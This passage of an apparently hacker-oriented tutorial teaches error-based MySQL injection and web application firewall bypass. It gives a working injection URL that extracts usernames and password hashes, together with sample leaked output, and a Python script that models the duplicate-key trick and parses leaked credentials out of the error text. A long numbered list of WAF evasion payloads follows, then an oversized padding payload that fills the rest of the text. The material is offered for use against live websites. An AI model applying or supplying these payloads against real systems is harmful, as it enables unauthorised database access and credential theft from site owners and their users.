WAF & WAF Bypassing

  1. Now, to pull the whole row for ID number 1 (usually the admin user), we use the same query, but concatenate more than just the ID:
    www.example.com/page.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(id,0x3a,username,0x3a,password)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
    Note that 0x3a is the hex encoding of the colon, used as a separator so the leaked values stay easy to read, and 0x7e is the ~ that closes the string. The whole query results in this error:
    ·         Duplicate entry '1:lammertw:0c5dbe3017f2dc6755933adb45735086~1' for key 'group_key'
    As noted before, strip the trailing ~1 (the ~ is our separator, the 1 is the floor(rand(0)*2) value the GROUP BY key appends) and you have the whole row:
    ID : Username : Password (an MD5 hash, not reversible encryption; read back if you don't remember how to crack it).
    Well done, you have now mastered a small part of error-based MySQL injection.
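The script below is an added example, not code from this page. It re-implements MySQL's RAND(seed) generator (the constants follow the server's randominit() and my_rnd() as I know them from the source, which is an assumption to verify against your target's version), simulates the lookup-then-insert double evaluation of the GROUP BY key that the floor(rand(0)*2) trick abuses, and parses the resulting Duplicate entry message back into fields. It shows two things the text states without explaining: why the error appears at all (the key is evaluated twice per row and rand(0) is a fixed sequence, so the third row collides with the first) and where the trailing ~1 comes from (our 0x7e separator followed by the rand digit). The sample error text is the one printed on this page.

```python
import re

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's my_rnd() generator


class MySQLRand:
    """RAND(seed) as MySQL computes it.

    Assumption: the seeding and update constants below are those of the
    server's randominit()/my_rnd(); verify against your target's version.
    """

    def __init__(self, seed):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(n, seed=0):
    """Successive values of floor(rand(seed)*2), the expression in the query."""
    r = MySQLRand(seed)
    return [int(r.next() * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    pass


def simulate_group_by(leak, rows, seed=0):
    """Model of the temporary table MySQL fills for
    ... concat(<leak>, floor(rand(seed)*2)) x ... GROUP BY x

    The key is evaluated once to look the group up and evaluated AGAIN when a
    new group row is inserted. Because rand(0) is a fixed sequence, the value
    used for the insert can equal a key that already exists; that is the
    'Duplicate entry' error that carries our data out. <leak> is the string
    the inner subquery produced, e.g. '1:admin:<hash>~'.
    """
    r = MySQLRand(seed)
    groups = {}
    for _ in range(rows):
        key = leak + str(int(r.next() * 2))  # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = leak + str(int(r.next() * 2))  # evaluation 2: insert
        if key in groups:
            raise DuplicateEntry("Duplicate entry '%s' for key 'group_key'" % key)
        groups[key] = 1
    return groups


def collision_message(leak, rows, seed=0):
    """The error text the server would report, or None if the query succeeds."""
    try:
        simulate_group_by(leak, rows, seed)
    except DuplicateEntry as e:
        return str(e)
    return None


def rows_needed(seed=0, limit=100):
    """Smallest number of rows in the GROUP BY source that triggers the error
    (the query groups over information_schema.tables, which always has enough)."""
    for n in range(1, limit + 1):
        if collision_message("x", n, seed) is not None:
            return n
    return None


DUP_RE = re.compile(r"Duplicate entry '(.*)' for key")


def parse_leak(error_text, separator="~"):
    """Extract the leaked fields from the error message: drop everything from
    the last separator (our 0x7e) onwards, which removes the appended rand
    digit, then split on the 0x3a colons."""
    m = DUP_RE.search(error_text)
    if m is None:
        return None
    value = m.group(1).rsplit(separator, 1)[0]
    return value.split(":")


if __name__ == "__main__":
    # The error line shown on this page, used as sample input.
    page_error = ("Duplicate entry '1:lammertw:0c5dbe3017f2dc6755933adb45735086~1' "
                  "for key 'group_key'")
    print("floor(rand(0)*2) sequence:", floor_rand_sequence(8))
    print("rows needed for the collision:", rows_needed())
    print(collision_message("1:admin:<hash>~", 3))
    print(parse_leak(page_error))
```

The first values of floor(rand(0)*2) are 0, 1, 1, 0, 1, 1, so row one is looked up under 0 but inserted under 1, row two is found under 1, and row three is looked up under 0 and inserted under 1 again, which collides. The collision therefore needs at least three rows in the table the GROUP BY runs over, which is why the query groups over information_schema.tables rather than over a possibly one-row users table, and why the leaked string always ends in 1.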
  2. First, what a WAF is and what it does for a website or server.
    WAF is short for Web Application Firewall. Its purpose is to inspect incoming requests and filter out the characters and keywords our queries rely on.

    On an unprotected site the injection would look like:
    www.example.com/page.php?id=1 and 1=0 union all select 1,2,3,4,5--

    Send that to a WAF-protected site and you get thrown out with a 403 Forbidden (or sometimes a 404 Not Found) instead of the page.

    Now that you know what a WAF is and what it does, here are some tips and tricks to bypass one.

    Comments used to bypass:
    ·         //
    ·         -- (note the trailing space: MySQL only treats -- as a comment when whitespace follows it, which is why the --+ and -- - forms below exist; the + is an encoded space in the URL)
    ·         /**/
    ·         #
    ·         --+
    ·         -- -
    ·         ; (a statement terminator rather than a comment, but used the same way to cut off the rest of the query)
    ·         -- a
    Bypassing a WAF is much like basic SQL injection, except that you now have filters to get past. Here are a few queries that CAN bypass them (it is never 100%).
    ·         page.php?id=1/*!UnIoN*/SeLeCT (Here we use /*! ... */, MySQL's versioned comment: other databases treat it as a comment, but MySQL executes what is inside it, so a filter that discards comment contents never sees the keyword. Mixing upper and lower case defeats case-sensitive matching at the same time. A plain /* ... */ without the ! is just whitespace to MySQL, so a keyword placed inside one is lost.)
    ·         page.php?id=1+UNIunionON+SeLselectECT+1,2,3,4,5-- (Here we double the text. It looks odd, but if the filter uses preg_replace (the PHP function) to replace union and select with a space or with nothing in a single pass, it removes only the inner copies, and the query the database receives still reads:
    UNION SELECT 1,2,3,4,5--
    ·         page.php?id=1%252f%252a*/UNION%252f%252a*/SELECT (Here we use double URL encoding, hence the %252f and %252a, which decode to %2f and %2a and only on a second decode to / and *. A WAF that decodes once sees %2f%2a, while an application that decodes again sees /*. It only works when the application does decode twice, which in my own testing was roughly 10-15% of sites.)
    Putting it all together: www.example.com/page.php?id=1 /*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*!information_schema*/.tables--

    This lists the table names, just as in Chapter 1.
    The rest of the exploitation you have to figure out yourself. I have given you the handles for WAF bypassing; a hacker has to work things through alone to really master or learn something. All this does is tickle your brain.
    Tips & tricks for bypassing more:
    1.  id=1+(UnIoN)+(SelECT)+
    2.  id=1+(UnIoN+SeLeCT)+
    3.  id=1+(UnI)(oN)+(SeL)(EcT)
    4.  id=1+'UnI''On'+'SeL''ECT'
    5.  id=1+%55nion all /*!12345%53elect*/ 1,version(),3--
    6.  id=1+UnIoN+SeLecT 1,2,3--
    7.  id=1+UnIOn/**/SeLect 1,2,3--
    8.  id=1+UNIunionON+SELselectECT 1,2,3--
    9.  id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3--
    10. id=1 and (select 1)=(Select 0xAA... with 1000 more A's)+UnIoN+SeLeCT 1,2,3--
    11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2,3--
    12. id=1+un/**/ion+sel/**/ect+1,2,3--
    13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
    14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
    15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--
    A few notes on the list. %55 and %53 in number 5 are URL-encoded U and S; %23 and %0a in number 11 are # and a newline, so the # comment ends at the newline and the keyword after it is live. Numbers 12 and 13 only exercise the filter: MySQL treats an ordinary comment as whitespace, so un/**/ion is the two tokens un and ion, and the /*U*//*n*/... form contains no keyword at all; both are syntax errors once they reach the database. Numbers 14 and 15 are HTTP parameter pollution: each comment body contains &id=, so a parser that splits the query string on & sees several short, harmless id values, while a back end that joins repeated parameters back together reconstructs the full statement.

    The odd-looking part only matters at the start of the query, where the filtered keywords are; the rest of the query can be written normally:
    www.example.com/page.php?id=1+(UnIoN)+(SelECT)+1,2,username,4,5+from+users--

    The unknown 500 server error bypass.
    Not many people know that the 500 server error trick counts as WAF bypassing. The idea is simple: we feed the filter a parameter far longer than it expects, so a filter with a bounded inspection buffer sees only the padding and lets the real payload after it through.
    Example:
    index.php?id=-1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA